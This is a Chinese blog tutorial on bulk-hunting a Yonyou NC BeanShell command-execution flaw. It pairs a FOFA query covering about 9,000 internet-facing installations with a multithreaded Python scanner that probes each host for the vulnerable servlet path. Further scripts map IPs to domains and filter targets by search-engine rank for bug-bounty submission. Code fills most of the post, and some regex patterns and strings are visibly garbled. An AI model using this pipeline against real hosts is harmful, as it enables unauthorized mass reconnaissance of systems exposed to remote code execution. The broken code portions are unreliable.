本篇只談漏洞的利用和批量挖掘。

在接觸src之前,我和很多師傅都有同一個疑問,就是那些大師傅是怎么批量挖洞的?摸滾打爬了兩個月之后,我漸漸有了點自己的理解和經驗,所以打算分享出來和各位師傅交流,不足之處還望指正。

漏洞舉例

這里以前幾天爆出來的用友nc的命令執行漏洞為例

http://x.x.x.x/servlet//~ic/bsh.servlet.BshServlet

文本框里可以命令執行

漏洞的批量檢測

在知道這個漏洞詳情之后,我們需要根據漏洞的特征去fofa里尋找全國范圍里使用這個系統的網站,比如用友nc在fofa的搜索特征就是

1
app="用友-UFIDA-NC"

可以看到一共有9119條結果,接下來我們需要采集所有站點的地址下來,這里推薦狼組安全團隊開發的fofa采集工具fofa-viewer

github地址:https://github.com/wgpsec/fofa_viewer

然后導出所有站點到一個txt文件中

根據用友nc漏洞命令執行的特征,我們簡單寫一個多線程檢測腳本

PYTHON

#-- coding:UTF-8 --
# Author:dota_st
# Date:2021/5/10 9:16
# blog: www.wlhhlc.top
import requests
import threadpool
import os
def exp(url):
    poc = r"""/servlet//~ic/bsh.servlet.BshServlet"""
    url = url + poc
    try:
        res = requests.get(url, timeout=3)
        if "BeanShell" in res.text:
            print("[*]存在漏洞的url:" + url)
            with open ("用友命令執行列表.txt", 'a') as f:
                f.write(url + "")
    except:
        pass
def multithreading(funcname, params=[], filename="yongyou.txt", pools=10):
    works = []
    with open(filename, "r") as f:
        for i in f:
            func_params = [i.rstrip("")] + params
            works.append((func_params, None))
    pool = threadpool.ThreadPool(pools)
    reqs = threadpool.makeRequests(funcname, works)
    [pool.putRequest(req) for req in reqs]
    pool.wait()
def main():
    if os.path.exists("用友命令執行列表.txt"):
        f = open("用友命令執行列表.txt", 'w')
        f.truncate()
    multithreading(exp, [], "yongyou.txt", 10)
if __name__ == '__main__':
    main()

運行完后得到所有漏洞站點的txt文件

域名和權重的批量檢測

在我們提交補天等漏洞平臺時,不免注意到有這么一個規則,公益漏洞的提交需要滿足站點的百度權重或者移動權重大于等于1,亦或者谷歌權重大于等于3的條件,補天漏洞平臺以愛站的檢測權重為準

https://rank.aizhan.com/

首先我們需要對收集過來的漏洞列表做一個ip反查域名,來證明歸屬,我們用爬蟲寫一個批量ip反查域名腳本

這里用了ip138和愛站兩個站點來進行ip反查域名

因為多線程會被ban,目前只采用了單線程

PYTHON

#-- coding:UTF-8 --
# Author:dota_st
# Date:2021/6/2 22:39
# blog: www.wlhhlc.top
import re, time
import requests
from fake_useragent import UserAgent
from tqdm import tqdm
import os
# ip138
def ip138_chaxun(ip, ua):
    ip138_headers = {
        'Host': 'site.ip138.com',
        'User-Agent': ua.random,
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
        'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'Accept-Encoding': 'gzip, deflate, br',
        'Referer': 'https://site.ip138.com/'}
    ip138_url = 'https://site.ip138.com/' + str(ip) + '/'
    try:
        ip138_res = requests.get(url=ip138_url, headers=ip138_headers, timeout=2).text
        if '
暫無結果
' not in ip138_res:
            result_site = re.findall(r"""""", ip138_res)
            return result_site
    except:
        pass
# 愛站
def aizhan_chaxun(ip, ua):
    aizhan_headers = {
        'Host': 'dns.aizhan.com',
        'User-Agent': ua.random,
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
        'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'Accept-Encoding': 'gzip, deflate, br',
        'Referer': 'https://dns.aizhan.com/'}
    aizhan_url = 'https://dns.aizhan.com/' + str(ip) + '/'
    try:
        aizhan_r = requests.get(url=aizhan_url, headers=aizhan_headers, timeout=2).text
        aizhan_nums = re.findall(r'''(.*?)''', aizhan_r)
        if int(aizhan_nums[0]) > 0:
            aizhan_domains = re.findall(r'''rel="nofollow" target="_blank">(.*?)''', aizhan_r)
            return aizhan_domains
    except:
        pass
def catch_result(i):
    ua_header = UserAgent()
    i = i.strip()
    try:
        ip = i.split(':')[1].split('//')[1]
        ip138_result = ip138_chaxun(ip, ua_header)
        aizhan_result = aizhan_chaxun(ip, ua_header)
        time.sleep(1)
        if ((ip138_result != None and ip138_result!=[]) or aizhan_result != None ):
            with open("ip反查結果.txt", 'a') as f:
                result = "[url]:" + i + "   " + "[ip138]:" + str(ip138_result) + "  [aizhan]:" + str(aizhan_result)
                print(result)
                f.write(result + "")
        else:
            with open("反查失敗列表.txt", 'a') as f:
                f.write(i + "")
    except:
        pass
if __name__ == '__main__':
    url_list = open("用友命令執行列表.txt", 'r').readlines()
    url_len = len(open("用友命令執行列表.txt", 'r').readlines())
    #每次啟動時清空兩個txt文件
    if os.path.exists("反查失敗列表.txt"):
        f = open("反查失敗列表.txt", 'w')
        f.truncate()
    if os.path.exists("ip反查結果.txt"):
        f = open("ip反查結果.txt", 'w')
        f.truncate()
    for i in tqdm(url_list):
        catch_result(i)

運行結果:

然后拿到解析的域名后,就是對域名權重進行檢測,這里采用愛站來進行權重檢測,繼續寫一個批量檢測腳本

PYTHON

#-- coding:UTF-8 --
# Author:dota_st
# Date:2021/6/2 23:39
# blog: www.wlhhlc.top
import re
import threadpool
import urllib.parse
import urllib.request
import ssl
from urllib.error import HTTPError
import time
import tldextract
from fake_useragent import UserAgent
import os
import requests
ssl._create_default_https_context = ssl._create_stdlib_context
bd_mb = []
gg = []
global flag
flag = 0
#數據清洗
def get_data():
    url_list = open("ip反查結果.txt").readlines()
    with open("domain.txt", 'w') as f:
        for i in url_list:
            i = i.strip()
            res = i.split('[ip138]:')[1].split('[aizhan]')[0].split(",")[0].strip()
            if res == 'None' or res == '[]':
                res = i.split('[aizhan]:')[1].split(",")[0].strip()
            if res != '[]':
                res = re.sub('[\'\[\]]', '', res)
                ext = tldextract.extract(res)
                res1 = i.split('[url]:')[1].split('[ip138]')[0].strip()
                res2 = "http://www." + '.'.join(ext[1:])
                result = '[url]:' + res1 + '\t' + '[domain]:' + res2
                f.write(result + "")
def getPc(domain):
    ua_header = UserAgent()
    headers = {
        'Host': 'baidurank.aizhan.com',
        'User-Agent': ua_header.random,
        'Sec-Fetch-Dest': 'document',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
        'Cookie': ''
    }
    aizhan_pc = 'https://baidurank.aizhan.com/api/br?domain={}&style=text'.format(domain)
    try:
        req = urllib.request.Request(aizhan_pc, headers=headers)
        response = urllib.request.urlopen(req,timeout=10)
        b = response.read()
        a = b.decode("utf8")
        result_pc = re.findall(re.compile(r'>(.*?)'),a)
        pc = result_pc[0]
        
    except HTTPError as u:
        time.sleep(3)
        return getPc(domain)
    return pc
def getMobile(domain):
    ua_header = UserAgent()
    headers = {
        'Host': 'baidurank.aizhan.com',
        'User-Agent': ua_header.random,
        'Sec-Fetch-Dest': 'document',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
        'Cookie': ''
    }
    aizhan_pc = 'https://baidurank.aizhan.com/api/mbr?domain={}&style=text'.format(domain)
    try:
        req = urllib.request.Request(aizhan_pc, headers=headers)
        response = urllib.request.urlopen(req,timeout=10)
        b = response.read()
        a = b.decode("utf8")
        result_m = re.findall(re.compile(r'>(.*?)'),a)
        mobile = result_m[0]
    except HTTPError as u:
        time.sleep(3)
        return getMobile(domain)
    return mobile
# 權重查詢
def seo(domain, url):
    try:
        result_pc = getPc(domain)
        result_mobile = getMobile(domain)
    except Exception as u:
        if flag == 0:
            print('[!] 目標{}檢測失敗,已寫入fail.txt等待重新檢測'.format(url))
            print(domain)
            with open('fail.txt', 'a', encoding='utf-8') as o:
                o.write(url + '')
        else:
            print('[!!]目標{}第二次檢測失敗'.format(url))
    result = '[+] 百度權重:'+ result_pc +'  移動權重:'+ result_mobile +'  '+url
    print(result)
    if result_pc =='0' and result_mobile =='0':
        gg.append(result)
    else:
        bd_mb.append(result)
    return True
def exp(url):
    try:
        main_domain = url.split('[domain]:')[1]
        ext = tldextract.extract(main_domain)
        domain = '.'.join(ext[1:])
        rew = seo(domain, url)
    except Exception as u:
        pass
def multithreading(funcname, params=[], filename="domain.txt", pools=15):
    works = []
    with open(filename, "r") as f:
        for i in f:
            func_params = [i.rstrip("")] + params
            works.append((func_params, None))
    pool = threadpool.ThreadPool(pools)
    reqs = threadpool.makeRequests(funcname, works)
    [pool.putRequest(req) for req in reqs]
    pool.wait()
def google_simple(url, j):
    google_pc = "https://pr.aizhan.com/{}/".format(url)
    bz = 0
    http_or_find = 0
    try:
        response = requests.get(google_pc, timeout=10).text
        http_or_find = 1
        result_pc = re.findall(re.compile(r'谷歌PR:(.*?)/>'), response)[0]
        result_num = result_pc.split('alt="')[1].split('"')[0].strip()
        if int(result_num) > 0:
            bz = 1
        result = '[+] 谷歌權重:' + result_num + '  ' + j
        return result, bz
    except:
        if(http_or_find !=0):
            result = "[!]格式錯誤:" + "j"
            return result, bz
        else:
            time.sleep(3)
            return google_simple(url, j)
def exec_function():
    if os.path.exists("fail.txt"):
        f = open("fail.txt", 'w', encoding='utf-8')
        f.truncate()
    else:
        f = open("fail.txt", 'w', encoding='utf-8')
    multithreading(exp, [], "domain.txt", 15)
    fail_url_list = open("fail.txt", 'r').readlines()
    if len(fail_url_list) > 0:
        print("*"*12 + "正在開始重新檢測失敗的url" + "*"*12)
        global flag
        flag = 1
        multithreading(exp, [], "fail.txt", 15)
    with open("權重列表.txt", 'w', encoding="utf-8") as f:
        for i in bd_mb:
            f.write(i + "")
        f.write("")
        f.write("-"*25 + "開始檢測谷歌的權重" + "-"*25 + "")
        f.write("")
        print("*" * 12 + "正在開始檢測谷歌的權重" + "*" * 12)
        for j in gg:
            main_domain = j.split('[domain]:')[1]
            ext = tldextract.extract(main_domain)
            domain = "www." + '.'.join(ext[1:])
            google_result, bz = google_simple(domain, j)
            time.sleep(1)
            print(google_result)
            if bz == 1:
                f.write(google_result + "")
    print("檢測完成,已保存txt在當前目錄下")
def main():
    get_data()
    exec_function()
if __name__ == "__main__":
    main()

漏洞提交

最后就是一個個拿去提交漏洞了

結尾

文中所寫腳本還處于勉強能用的狀態,后續會進行優化更改。師傅們如有需要也可選擇自行更改。